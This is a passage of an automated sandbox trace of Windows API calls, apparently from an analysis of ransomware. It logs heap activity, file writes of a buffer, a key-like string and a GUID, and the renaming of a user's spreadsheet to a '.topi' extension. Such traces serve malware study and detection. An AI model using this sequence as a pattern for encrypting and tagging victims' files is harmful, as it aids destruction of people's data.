RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e98 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e68 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e68 [0097.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e68 | out: hHeap=0x680000) returned 1 [0097.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0097.458] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df338 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e98 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e80 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e50 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e38 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb5c0 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.459] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xbfea, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xbfea, lpOverlapped=0x0) returned 1 [0097.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.459] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xbfef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.459] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.460] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.460] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.460] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.460] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.460] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.460] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.460] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.460] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.460] CloseHandle (hObject=0x6a8) returned 1 [0097.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xe0) returned 0x3199338 [0097.488] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e0) returned 0x31cf750 [0097.488] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3199338 | out: hHeap=0x680000) returned 1 [0097.488] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\8heHk9af GbEpY7rj\\7PbuEtvt0tlm9r.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\8hehk9af gbepy7rj\\7pbuetvt0tlm9r.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\8heHk9af GbEpY7rj\\7PbuEtvt0tlm9r.xls.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\8hehk9af gbepy7rj\\7pbuetvt0tlm9r.xls.topi")) returned 1 [0097.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.493] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.493] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.495] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfca76030, ftCreationTime.dwHighDateTime=0x1d5c46b, ftLastAccessTime.dwLowDateTime=0x62771a0, ftLastAccessTime.dwHighDateTime=0x1d5bf43, ftLastWriteTime.dwLowDateTime=0x62771a0, ftLastWriteTime.dwHighDateTime=0x1d5bf43, nFileSizeHigh=0x0, nFileSizeLow=0xbfef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7PbuEtvt0tlm9r.xls", cAlternateFileName="7PBUET~1.XLS")) returned 0 [0097.495] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ed08 | out: hHeap=0x680000) returned 1 [0097.495] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.495] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0097.495] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.495] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.495] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.495] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0097.500] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0097.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0097.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 